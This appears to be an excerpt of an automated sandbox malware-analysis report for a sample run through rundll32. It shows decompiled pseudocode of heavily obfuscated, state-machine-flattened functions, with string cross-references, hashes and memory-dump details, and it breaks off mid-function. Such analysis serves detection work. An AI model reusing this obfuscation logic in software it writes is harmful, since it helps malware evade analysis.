0x0044cb23
0x0044cb24
0x0044cb29
0x0044cb2a
0x0044cb2d
0x0044cb31
0x0044cb31
0x0044cb36
0x0044cb3a
0x0044cb3f
0x0044cb3f
0x00000000
0x0044cb3f
0x0044cad8
0x0044cad4
0x0044cbd8
0x0044cbe6
0x0044cbe6
0x0044ca1f
0x0044caa5
0x0044caab
0x0044caad
0x0044caba
0x00000000
0x0044ca21
0x0044ca27
0x0044ca6e
0x0044ca86
0x0044ca8b
0x0044ca8e
0x0044ca90
0x00000000
0x0044ca29
0x0044ca2f
0x0044cbb3
0x0044cbb9
0x0044cbbb
0x0044cbc5
0x0044cbc8
0x0044cbcd
0x0044cbd0
0x0044cbbb
0x0044cbd4
0x0044ca35
0x0044ca3b
0x0044ca60
0x00000000
0x0044ca3d
0x0044ca43
0x00000000
0x0044ca49
0x0044ca53
0x0044ca59
0x0044ca0e
0x00000000
0x0044ca0e
0x0044ca0e
0x0044ca43
0x0044ca3b
0x0044ca2f
0x0044ca27
0x00000000
0x0044ca1f

Strings

`, xrefs: 0044C885
, xrefs: 0044C8BE
K*D, xrefs: 0044CAEA
e\, xrefs: 0044C929
+O :, xrefs: 0044CACE
CE, xrefs: 0044C9C1
J, xrefs: 0044C739
+O :, xrefs: 0044CB9B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +O :$+O :$CE$J$K*D$`$e\$
API String ID: 0-1729304812
Opcode ID: 84697aec3bd0591b28c3682c7d7936c0193655b345e9cc36787d91fcd9e0507b
Instruction ID: a39ad72b0c20e8780b86818c5093e3d2ee21476b664d2e53f064b0280467f4c6
Opcode Fuzzy Hash: 84697aec3bd0591b28c3682c7d7936c0193655b345e9cc36787d91fcd9e0507b
Instruction Fuzzy Hash: D4D173711093418FE368CF26D48950BFBE1FBC4718F148A0EF58296260DBB9D94ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 0018BC4D, Relevance: 10.3, Strings: 8, Instructions: 297COMMON

Download Yara Rule

Strings

, xrefs: 0018BE32
e\, xrefs: 0018BE9D
+O :, xrefs: 0018C10F
J, xrefs: 0018BCAD
CE, xrefs: 0018BF35
K*D, xrefs: 0018C05E
`, xrefs: 0018BDF9
+O :, xrefs: 0018C042

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: +O :$+O :$CE$J$K*D$`$e\$
API String ID: 0-1729304812
Opcode ID: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
Instruction ID: 923a89828eeb19acc5abcf3a669feeed03b957fad89e1ebda9ad32592e04155a
Opcode Fuzzy Hash: a4ea01c878fee7e1ce2c2fd3f59fe79c4fb56f583e482c284198a7485486c535
Instruction Fuzzy Hash: CAD152721083419BD358DF25C88941BBBE2FBC4758F108A0EF696962A0D7B5DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0043C364, Relevance: 10.3, Strings: 8, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E0043C364() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				unsigned int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _t323;
				short* _t338;
				void* _t343;
				signed int _t347;
				void* _t349;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int* _t398;

				_t398 =  &_v1160;
				_v1044 = 0xb4bf;
				_t349 = 0x14e1bd3d;
				_t347 = 0x32;
				_v1044 = _v1044 / _t347;
				_v1044 = _v1044 ^ 0x000063a2;
				_v1120 = 0x1c18;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 ^ 0xbedc4282;
				_v1120 = _v1120 ^ 0xbedc611c;
				_v1096 = 0xe102;
				_v1096 = _v1096 | 0x1f52717c;
				_v1096 = _v1096 + 0x31d9;
				_v1096 = _v1096 ^ 0x1f532ca5;
				_v1112 = 0x173b;
				_t389 = 0x5f;
				_v1112 = _v1112 / _t389;
				_v1112 = _v1112 | 0xb3fa1704;
				_v1112 = _v1112 ^ 0xb3fa37e7;
				_v1068 = 0x9869;
				_t387 = 0x69;
				_t390 = 0x53;
				_v1068 = _v1068 * 0x43;
				_v1068 = _v1068 ^ 0x0027b996;
				_v1084 = 0xcfb9;
				_v1084 = _v1084 >> 0xf;
				_v1084 = _v1084 + 0x12c;
				_v1084 = _v1084 ^ 0x000024ff;
				_v1128 = 0x3cd5;
				_v1128 = _v1128 | 0x566ade8e;
				_v1128 = _v1128 >> 9;
				_v1128 = _v1128 + 0xffff5a4b;
				_v1128 = _v1128 ^ 0x002ae40f;
				_v1104 = 0x6c2b;
				_v1104 = _v1104 | 0x9ff8dffb;
				_v1104 = _v1104 ^ 0x9ff8a878;
				_v1056 = 0xffd2;
				_v1056 = _v1056 + 0xffff840f;
				_v1056 = _v1056 ^ 0x0000ebeb;
				_v1152 = 0x1736;
				_v1152 = _v1152 | 0x4cb32822;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0xb8cf;
				_v1152 = _v1152 ^ 0x00bbe158;
				_v1080 = 0x5ef;
				_v1080 = _v1080 + 0xffff8539;
				_v1080 = _v1080 / _t390;
				_v1080 = _v1080 ^ 0x0315a6d4;
				_v1048 = 0xf210;
				_v1048 = _v1048 | 0xcb23d8d0;
				_v1048 = _v1048 ^ 0xcb23a87f;
				_v1144 = 0x90;
				_t391 = 0x31;
				_v1144 = _v1144 / _t391;
				_v1144 = _v1144 + 0xffff80e0;
				_t392 = 0x67;
				_v1144 = _v1144 / _t392;
				_v1144 = _v1144 ^ 0x027c3ad8;
				_v1072 = 0xc5ae;
				_t393 = 0x16;
				_v1072 = _v1072 / _t393;
				_t394 = 0x60;
				_v1072 = _v1072 / _t394;
				_v1072 = _v1072 ^ 0x00006ed7;
				_v1136 = 0xa4ba;
				_v1136 = _v1136 ^ 0xe75bfca7;
				_t395 = 0x7b;
				_v1136 = _v1136 * 0x5c;
				_v1136 = _v1136 ^ 0xe80995ee;
				_v1136 = _v1136 ^ 0xccda384c;
				_v1156 = 0x7c9c;
				_v1156 = _v1156 + 0xffffb410;
				_v1156 = _v1156 + 0xfffffa49;
				_v1156 = _v1156 >> 8;
				_v1156 = _v1156 ^ 0x000056b1;
				_v1160 = 0x84ff;
				_v1160 = _v1160 ^ 0xed45694c;
				_t148 =  &_v1160; // 0xed45694c
				_v1160 =  *_t148 * 0x62;
				_v1160 = _v1160 + 0xffff41d7;
				_v1160 = _v1160 ^ 0xd4c40e06;
				_v1092 = 0x1d87;
				_v1092 = _v1092 << 8;
				_v1092 = _v1092 ^ 0x7d24d215;
				_v1092 = _v1092 ^ 0x7d392b35;
				_v1060 = 0x93f7;
				_v1060 = _v1060 + 0xffff7474;
				_v1060 = _v1060 ^ 0x00001886;
				_v1064 = 0xef31;
				_v1064 = _v1064 >> 0x10;
				_v1064 = _v1064 ^ 0x000047fd;
				_v1148 = 0x11a7;
				_v1148 = _v1148 | 0x5b5dfd11;
				_v1148 = _v1148 << 6;
				_v1148 = _v1148 + 0xffff2c3e;
				_v1148 = _v1148 ^ 0xd77ed371;
				_v1100 = 0x7077;
				_v1100 = _v1100 / _t387;
				_v1100 = _v1100 | 0x4c8a3f77;
				_v1100 = _v1100 ^ 0x4c8a3283;
				_v1140 = 0x668c;
				_v1140 = _v1140 | 0x54be0880;
				_v1140 = _v1140 + 0xd8b3;
				_v1140 = _v1140 / _t395;
				_v1140 = _v1140 ^ 0x00b05f67;
				_v1076 = 0x11c3;
				_v1076 = _v1076 >> 6;
				_v1076 = _v1076 ^ 0x5bd60e39;
				_v1076 = _v1076 ^ 0x5bd63952;
				_v1124 = 0x5174;
				_v1124 = _v1124 * 0x1a;
				_v1124 = _v1124 + 0xffff3f27;
				_t323 = _v1124;
				_t381 = _t323 % _t347;
				_v1124 = _t323 / _t347;
				_v1124 = _v1124 ^ 0x00007b90;
				_v1132 = 0x9c48;
				_v1132 = _v1132 << 2;
				_v1132 = _v1132 ^ 0x5e61e8c2;
				_v1132 = _v1132 ^ 0xca6ca211;
				_v1132 = _v1132 ^ 0x940f5e6e;
				_v1052 = 0xbbfe;
				_v1052 = _v1052 >> 0xc;
				_v1052 = _v1052 ^ 0x00003fa7;
				_v1108 = 0xdf34;
				_v1108 = _v1108 * 0x2f;
				_v1108 = _v1108 + 0xffff7f6f;
				_v1108 = _v1108 ^ 0x0028118b;
				_v1116 = 0x2c66;
				_v1116 = _v1116 >> 2;
				_v1116 = _v1116 ^ 0x28bea5fc;
				_v1116 = _v1116 ^ 0x28beb247;
				_v1088 = 0x89d3;
				_v1088 = _v1088 >> 2;
				_v1088 = _v1088 + 0xa943;
				_v1088 = _v1088 ^ 0x0000f687;
				do {
					while(_t349 != 0x14e1bd3d) {
						if(_t349 == 0x1c504520) {
							E00433B74();
							L9:
							_t349 = 0x363d246c;
							continue;
						}
						if(_t349 == 0x1e34bac7) {
							E0043F4A2(_v1156, _t381, _v1160, _v1092,  &_v1040);
							_push( &_v1040);
							E00437571( &_v1040);
							_t381 = _v1100;
							E0044CBE7( &_v520, _v1100, __eflags, _v1140, _v1076,  &_v1040);
							_t398 =  &(_t398[2]) - 0xc + 0x20;
							_t349 = 0x2b0461c4;
							continue;
						}
						if(_t349 == 0x2b0461c4) {
							_t338 = E0043BDCC( &_v520, _v1124, _v1132, _v1052);
							__eflags = 0;
							 *_t338 = 0;
							_t298 =  &_v1108; // 0x7d392b35
							return E00445183( *_t298, _v1116, _v1088,  &_v520);
						}
						if(_t349 == 0x35103033) {
							_t343 = E0044434E();
							goto L9;
						}
						_t408 = _t349 - 0x363d246c;
						if(_t349 != 0x363d246c) {
							goto L15;
						}
						_push(0x4312d8);
						_push(_v1128);
						_push(_v1084);
						E0043A4D7(_t408, _v1056, _v1152, _v1080, _v1048, E00435DFC(_v1112, _v1068, _t408),  *0x451088 + 0x254,  &_v520,  *0x451088 + 0x38);
						_t381 = _v1072;
						_t273 =  &_v1144; // 0x7d392b35
						_t343 = E00440D6D( *_t273, _v1072, _v1136, _t344);
						_t398 =  &(_t398[0xd]);
						_t349 = 0x1e34bac7;
					}
					__eflags =  *((intOrPtr*)( *0x451088 + 0x244));
					if(__eflags == 0) {
						_t349 = 0x1c504520;
						goto L15;
					}
					_t349 = 0x35103033;
					continue;
					L15:
					__eflags = _t349 - 0xa5a6948;
				} while (__eflags != 0);
				return _t343;
			}

0x0043c364
0x0043c36a
0x0043c378
0x0043c383
0x0043c388
0x0043c391
0x0043c39c
0x0043c3a4
0x0043c3a9
0x0043c3b1
0x0043c3b9
0x0043c3c1
0x0043c3c9
0x0043c3d1
0x0043c3d9
0x0043c3e5
0x0043c3ea
0x0043c3f0
0x0043c3f8
0x0043c400
0x0043c40d
0x0043c410
0x0043c413
0x0043c417
0x0043c41f
0x0043c427
0x0043c42c
0x0043c434
0x0043c43c
0x0043c444
0x0043c44c
0x0043c451
0x0043c459
0x0043c461
0x0043c469
0x0043c471
0x0043c479
0x0043c481
0x0043c489
0x0043c491
0x0043c499
0x0043c4a9
0x0043c4ad
0x0043c4b5
0x0043c4bd
0x0043c4c5
0x0043c4d5
0x0043c4d9
0x0043c4e1
0x0043c4ec
0x0043c4f7
0x0043c502
0x0043c50e
0x0043c511
0x0043c515
0x0043c525
0x0043c52a
0x0043c52e
0x0043c536
0x0043c544
0x0043c549
0x0043c553
0x0043c558
0x0043c55c
0x0043c564
0x0043c56c
0x0043c57b
0x0043c57c
0x0043c580
0x0043c588
0x0043c590
0x0043c598
0x0043c5a0
0x0043c5a8
0x0043c5ad
0x0043c5b5
0x0043c5bd
0x0043c5c5
0x0043c5ca
0x0043c5ce
0x0043c5d6
0x0043c5de
0x0043c5e6
0x0043c5eb
0x0043c5f3
0x0043c5fb
0x0043c603
0x0043c60b
0x0043c613
0x0043c61b
0x0043c620
0x0043c628
0x0043c630
0x0043c638
0x0043c63d
0x0043c645
0x0043c64d
0x0043c65d
0x0043c661
0x0043c669
0x0043c671
0x0043c679
0x0043c681
0x0043c691
0x0043c695
0x0043c69d
0x0043c6a5
0x0043c6aa
0x0043c6b2
0x0043c6ba
0x0043c6c7
0x0043c6cb
0x0043c6d3
0x0043c6d7
0x0043c6d9
0x0043c6dd
0x0043c6e5
0x0043c6f2
0x0043c6fc
0x0043c709
0x0043c711
0x0043c719
0x0043c721
0x0043c726
0x0043c72e
0x0043c73b
0x0043c73f
0x0043c747
0x0043c74f
0x0043c757
0x0043c75c
0x0043c764
0x0043c76c
0x0043c774
0x0043c779
0x0043c781
0x0043c789
0x0043c789
0x0043c797
0x0043c8c1
0x0043c84f
0x0043c84f
0x00000000
0x0043c84f
0x0043c7a3
0x0043c86a
0x0043c885
0x0043c88b
0x0043c8a7
0x0043c8ab
0x0043c8b0
0x0043c8b3
0x00000000
0x0043c8b3
0x0043c7af
0x0043c900
0x0043c905
0x0043c907
0x0043c91a
0x00000000
0x0043c923
0x0043c7b7
0x0043c84a
0x00000000
0x0043c84a
0x0043c7bd
0x0043c7bf
0x00000000
0x00000000
0x0043c7c5
0x0043c7ca
0x0043c7ce
0x0043c818
0x0043c822
0x0043c829
0x0043c82d
0x0043c832
0x0043c835
0x0043c835
0x0043c8cd
0x0043c8d4
0x0043c8dd
0x00000000
0x0043c8dd
0x0043c8d6
0x00000000
0x0043c8df
0x0043c8df
0x0043c8df
0x00000000

Strings

HiZ, xrefs: 0043C8DF
5+9}, xrefs: 0043C829
tQ, xrefs: 0043C6BA
f,, xrefs: 0043C74F
l$=6, xrefs: 0043C704
LiE, xrefs: 0043C5C5
1, xrefs: 0043C613
wp, xrefs: 0043C64D

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
API String ID: 0-3332840876
Opcode ID: 1684fe110ef648ce5a2bb697d8b3646abbae2119994f56d3be3942be1cf88dc5
Instruction ID: ecb09237cdf98ce76d4d299b70f5fe0a50d5a40ea4b28efb226884c5ab01a882
Opcode Fuzzy Hash: 1684fe110ef648ce5a2bb697d8b3646abbae2119994f56d3be3942be1cf88dc5
Instruction Fuzzy Hash: AAE133715093419FD368CF26C58995FBBF1BBC8B18F50891DF2A5862A0C7B98A09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0017B8D8, Relevance: 10.3, Strings: 8, Instructions: 290COMMON

Download Yara Rule

Strings

f,, xrefs: 0017BCC3
l$=6, xrefs: 0017BC78
5+9}, xrefs: 0017BD9D
1, xrefs: 0017BB87
HiZ, xrefs: 0017BE53
LiE, xrefs: 0017BB39
wp, xrefs: 0017BBC1
tQ, xrefs: 0017BC2E

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 1$5+9}$HiZ$LiE$f,$l$=6$tQ$wp
API String ID: 0-3332840876
Opcode ID: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
Instruction ID: 6f8d1da4d67b27999385d5feb223a9f0a1bf209bbf47d10f790c853bf75f4063
Opcode Fuzzy Hash: 59573d73a54ce591e743191370aa59263fa98defaa15bace4ac305a490d770c9
Instruction Fuzzy Hash: 8DE110715097418FD368CF26C58995FBBF1BBC4B18F50891DF2AA862A0D7B5CA09CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0044DBC4, Relevance: 10.2, Strings: 8, Instructions: 247
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0044DBC4(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t251;
				void* _t256;
				void* _t257;
				void* _t258;
				void* _t263;
				void* _t268;
				void* _t273;
				void* _t275;
				void* _t276;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				intOrPtr _t296;
				void* _t297;
				signed int* _t299;
				void* _t306;

				_t299 =  &_v112;
				_v8 = 0x20016e;
				_t296 = 0;
				_t276 = __ecx;
				_v4 = 0;
				_t297 = 0x341554bf;
				_v52 = 0xc9b1;
				_v52 = _v52 | 0x2e528fe0;
				_t278 = 0xb;
				_v52 = _v52 * 0x55;
				_v52 = _v52 ^ 0x617f5ce2;
				_v100 = 0x134d;
				_v100 = _v100 | 0x49cd1c97;
				_v100 = _v100 << 0x10;
				_v100 = _v100 / _t278;
				_v100 = _v100 ^ 0x02e5e2d4;
				_v24 = 0xae5f;
				_t279 = 0x4b;
				_v24 = _v24 / _t279;
				_v24 = _v24 ^ 0x00004c4a;
				_v112 = 0xcc08;
				_v112 = _v112 << 6;
				_v112 = _v112 | 0x88c75b70;
				_t280 = 0x47;
				_v112 = _v112 * 0x55;
				_v112 = _v112 ^ 0x7a21016f;
				_v64 = 0x9f4b;
				_v64 = _v64 + 0x616b;
				_v64 = _v64 + 0xe20a;
				_v64 = _v64 ^ 0x0001dfd5;
				_v28 = 0x1fae;
				_v28 = _v28 / _t280;
				_v28 = _v28 ^ 0x00004ec5;
				_v104 = 0x5d77;
				_v104 = _v104 + 0x537;
				_v104 = _v104 ^ 0x96a0085a;
				_v104 = _v104 << 0xc;
				_v104 = _v104 ^ 0x06af5270;
				_v108 = 0xb68c;
				_v108 = _v108 + 0x2584;
				_v108 = _v108 * 0x34;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x016589aa;
				_v56 = 0x4faa;
				_v56 = _v56 + 0xffff23d2;
				_v56 = _v56 + 0xffff95f1;
				_v56 = _v56 ^ 0xffff6d68;
				_v60 = 0xec8;
				_v60 = _v60 ^ 0x81b41c80;
				_v60 = _v60 | 0x3699af79;
				_v60 = _v60 ^ 0xb7bdea19;
				_v68 = 0x17f7;
				_v68 = _v68 * 0x21;
				_v68 = _v68 << 2;
				_v68 = _v68 ^ 0x000c2d44;
				_v32 = 0xf9f5;
				_v32 = _v32 | 0xd49d42a3;
				_v32 = _v32 ^ 0xd49daf29;
				_v72 = 0xd36d;
				_v72 = _v72 + 0xffffdb20;
				_v72 = _v72 ^ 0x00009306;
				_v76 = 0x522c;
				_t281 = 0x43;
				_v76 = _v76 / _t281;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0000dde2;
				_v12 = 0x1c43;
				_v12 = _v12 ^ 0xefc0aea8;
				_v12 = _v12 ^ 0xefc08e31;
				_v48 = 0x803b;
				_v48 = _v48 ^ 0x188f99f3;
				_v48 = _v48 ^ 0x134b5df5;
				_v48 = _v48 ^ 0x0bc40f93;
				_v16 = 0xe843;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x000063b5;
				_v92 = 0xef1;
				_v92 = _v92 + 0xffffaf3d;
				_v92 = _v92 + 0xec79;
				_v92 = _v92 * 0x5e;
				_v92 = _v92 ^ 0x003efb8a;
				_v20 = 0xa38a;
				_v20 = _v20 >> 2;
				_v20 = _v20 ^ 0x00006e81;
				_v96 = 0xdc33;
				_v96 = _v96 | 0xf1642443;
				_v96 = _v96 + 0xffffa62c;
				_v96 = _v96 >> 2;
				_v96 = _v96 ^ 0x3c59759f;
				_v36 = 0x935d;
				_v36 = _v36 ^ 0x8b551063;
				_v36 = _v36 ^ 0x8b558f98;
				_v80 = 0xa58;
				_v80 = _v80 >> 1;
				_v80 = _v80 >> 0xa;
				_v80 = _v80 ^ 0x00006691;
				_v84 = 0x2438;
				_v84 = _v84 | 0x4658edca;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x01219229;
				_v84 = _v84 ^ 0x01218cc4;
				_v88 = 0x580e;
				_v88 = _v88 | 0xb8772654;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x5f1f4a93;
				_v88 = _v88 ^ 0x7fbf3adc;
				_v40 = 0xd338;
				_v40 = _v40 * 0x2d;
				_v40 = _v40 ^ 0xc6aa335d;
				_v40 = _v40 ^ 0xc68f75fb;
				_v44 = 0xf949;
				_v44 = _v44 << 0xd;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0001c255;
				goto L1;
				do {
					while(1) {
						L1:
						_t306 = _t297 - 0x261de027;
						if(_t306 > 0) {
							break;
						}
						if(_t306 == 0) {
							_t258 = E00446B54(_t276, _v52, _v100);
							_t299 =  &(_t299[1]);
							_t297 = 0x13a0f061;
							_t296 = _t296 + _t258;
							continue;
						} else {
							if(_t297 == 0x71bdf61) {
								_t263 = E00442493();
								_t299 = _t299 - 0xc + 0xc;
								_t297 = 0x195a7642;
								_t296 = _t296 + _t263;
								continue;
							} else {
								if(_t297 == 0x13a0f061) {
									_t268 = E00442493();
									_t299 = _t299 - 0xc + 0xc;
									_t297 = 0x71bdf61;
									_t296 = _t296 + _t268;
									continue;
								} else {
									if(_t297 == 0x195a7642) {
										_t273 = E00442493();
										_t299 = _t299 - 0xc + 0xc;
										_t297 = 0x28ce47a5;
										_t296 = _t296 + _t273;
										continue;
									} else {
										if(_t297 == 0x24e4826b) {
											_t275 = E00446B54(_t276 + 0x20, _v36, _v80);
											_t299 =  &(_t299[1]);
											_t297 = 0x262fff8d;
											_t296 = _t296 + _t275;
											continue;
										}
									}
								}
							}
						}
						goto L20;
					}
					if(_t297 == 0x262fff8d) {
						_t251 = E00442493();
						_t299 = _t299 - 0xc + 0xc;
						_t297 = 0x558fb04;
						_t296 = _t296 + _t251;
					} else {
						if(_t297 == 0x28ce47a5) {
							_t256 = E00442493();
							_t299 = _t299 - 0xc + 0xc;
							_t297 = 0x2c38dfc0;
							_t296 = _t296 + _t256;
							goto L1;
						} else {
							if(_t297 == 0x2c38dfc0) {
								_t257 = E00446B54(_t276 + 0x18, _v20, _v96);
								_t299 =  &(_t299[1]);
								_t297 = 0x24e4826b;
								_t296 = _t296 + _t257;
								goto L1;
							} else {
								if(_t297 == 0x341554bf) {
									_t297 = 0x261de027;
									goto L1;
								}
							}
						}
					}
					L20:
				} while (_t297 != 0x558fb04);
				return _t296;
			}

0x0044dbc4
0x0044dbc7
0x0044dbd5
0x0044dbd7
0x0044dbd9
0x0044dbdd
0x0044dbe2
0x0044dbea
0x0044dbf9
0x0044dbfc
0x0044dc00
0x0044dc08
0x0044dc10
0x0044dc18
0x0044dc25
0x0044dc29
0x0044dc31
0x0044dc3d
0x0044dc42
0x0044dc48
0x0044dc50
0x0044dc58
0x0044dc5d
0x0044dc6a
0x0044dc6b
0x0044dc6f
0x0044dc77
0x0044dc7f
0x0044dc87
0x0044dc8f
0x0044dc97
0x0044dca5
0x0044dca9
0x0044dcb1
0x0044dcb9
0x0044dcc1
0x0044dcc9
0x0044dcce
0x0044dcd6
0x0044dcde
0x0044dceb
0x0044dcef
0x0044dcf4
0x0044dcfc
0x0044dd04
0x0044dd0c
0x0044dd14
0x0044dd1c
0x0044dd24
0x0044dd2c
0x0044dd34
0x0044dd3c
0x0044dd49
0x0044dd4d
0x0044dd52
0x0044dd5a
0x0044dd62
0x0044dd6a
0x0044dd72
0x0044dd82
0x0044dd8a
0x0044dd94
0x0044dda7
0x0044ddaa
0x0044ddb3
0x0044ddb7
0x0044ddbf
0x0044ddc7
0x0044ddcf
0x0044ddd7
0x0044dddf
0x0044dde7
0x0044ddef
0x0044ddf7
0x0044ddff
0x0044de04
0x0044de0c
0x0044de14
0x0044de1c
0x0044de29
0x0044de2d
0x0044de35
0x0044de3d
0x0044de42
0x0044de4a
0x0044de52
0x0044de5a
0x0044de62
0x0044de67
0x0044de6f
0x0044de77
0x0044de7f
0x0044de87
0x0044de8f
0x0044de93
0x0044de98
0x0044dea0
0x0044dea8
0x0044deb0
0x0044deb5
0x0044debd
0x0044dec5
0x0044decd
0x0044ded5
0x0044deda
0x0044dee2
0x0044deea
0x0044def7
0x0044defb
0x0044df03
0x0044df0b
0x0044df13
0x0044df18
0x0044df1d
0x0044df1d
0x0044df25
0x0044df25
0x0044df25
0x0044df25
0x0044df27
0x00000000
0x00000000
0x0044df2d
0x0044dff3
0x0044dff8
0x0044dffb
0x0044e000
0x00000000
0x0044df33
0x0044df39
0x0044dfd5
0x0044dfda
0x0044dfdd
0x0044dfe2
0x00000000
0x0044df3f
0x0044df45
0x0044dfae
0x0044dfb3
0x0044dfb6
0x0044dfbb
0x00000000
0x0044df47
0x0044df4d
0x0044df8a
0x0044df8f
0x0044df92
0x0044df97
0x00000000
0x0044df4f
0x0044df55
0x0044df66
0x0044df6b
0x0044df6e
0x0044df73
0x00000000
0x0044df73
0x0044df55
0x0044df4d
0x0044df45
0x0044df39
0x00000000
0x0044df2d
0x0044e00d
0x0044e08a
0x0044e08f
0x0044e092
0x0044e097
0x0044e00f
0x0044e015
0x0044e063
0x0044e068
0x0044e06b
0x0044e070
0x00000000
0x0044e017
0x0044e01d
0x0044e039
0x0044e03e
0x0044e041
0x0044e046
0x00000000
0x0044e01f
0x0044e025
0x0044e027
0x00000000
0x0044e027
0x0044e025
0x0044e01d
0x0044e015
0x0044e099
0x0044e099
0x0044e0ae

Strings

C, xrefs: 0044DDF7
y, xrefs: 0044DE1C
X, xrefs: 0044DE87
ka, xrefs: 0044DC7F
,R, xrefs: 0044DD94
JL, xrefs: 0044DC48
w], xrefs: 0044DCB1
8$, xrefs: 0044DEA0

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,R$8$$C$JL$X$ka$w]$y
API String ID: 0-1177348588
Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction ID: 91131dd738a98f5dfd051b669c1b51f8da970be96f89349f0b40961c1c20a042
Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction Fuzzy Hash: F3C112B29093808FE358CF25D58A40BFBE0BBD4758F104A1EF59696260D7B9DA09CF47

Uniqueness

Uniqueness Score: -1.00%

Function 0018D138, Relevance: 10.2, Strings: 8, Instructions: 247COMMON

Download Yara Rule

Strings

ka, xrefs: 0018D1F3
w], xrefs: 0018D225
8$, xrefs: 0018D414
C, xrefs: 0018D36B
y, xrefs: 0018D390
X, xrefs: 0018D3FB
,R, xrefs: 0018D308
JL, xrefs: 0018D1BC

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,R$8$$C$JL$X$ka$w]$y
API String ID: 0-1177348588
Opcode ID: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction ID: a4e7ea4771f4e4f7bd3fc554e68f5c72a36bb749f0d75c67c34b8c06cb8db9b9
Opcode Fuzzy Hash: 08c96f82fba47343827c7bed5efdf3b11118330523bd83467504f0b3eac7eb9d
Instruction Fuzzy Hash: 47C122B29093809FD358DF25E58A40BFBE0BBD4748F104A1DF596962A4D3B4DA09CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00446BE4, Relevance: 10.2, Strings: 8, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00446BE4(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				unsigned int _v1580;
				signed int _v1584;
				signed int _v1588;
				unsigned int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
